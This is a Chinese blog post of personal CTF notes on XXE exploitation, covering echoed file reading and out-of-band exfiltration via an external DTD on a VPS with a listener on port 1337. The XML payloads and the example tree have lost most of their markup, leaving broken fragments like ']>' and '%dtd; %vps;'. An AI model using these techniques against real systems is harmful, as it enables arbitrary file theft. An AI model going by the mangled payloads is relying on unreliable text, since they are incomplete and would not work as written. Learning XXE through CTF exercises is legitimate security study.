【心得】XXE漏洞利用个人笔记

XML中关于DTD类型(内部(SYSTEM)的和外部(PUBLIC)的区别)

xxe的利用


XML Entity 实体注入

当程序处理xml文件时,没有禁止对外部实体的处理,容易造成xxe漏洞

危害

主流是任意文件读取

XML 文件

一般表示带有结构的数据

祖父  3个叔父  8个堂弟堂妹   

<祖父>

    <叔父1>
        <堂兄1>
   

    <叔父2>
     <堂兄2>    
   

    <叔父3>

     <堂兄3>
   

xml格式


1 有回显时文件读取方法



   
]> 


   
        &hacker;
   

例题1 web89

【心得】XXE漏洞利用个人笔记_第1张图片

post传:





    
        hacker
    

看到回显hacker

【心得】XXE漏洞利用个人笔记_第2张图片

可以实现任意文件回显

payload:



]> 


    
        &hacker;
    

【心得】XXE漏洞利用个人笔记_第3张图片

 这里文件名纯靠猜,文件读取是建立在文件名已知的基础上的

2 无回显时文件读取方法

例题2 web90

【心得】XXE漏洞利用个人笔记_第4张图片

 无回显点,考虑数据外带

 post传


   
   
    %myurl;
]> 

1

在vps上创建文件test.dtd

test.dtd内容

">
%dtd;
%vps;

vps监听1337端口即可

你可能感兴趣的:(笔记,xxe,CTF,WEB,web安全,安全)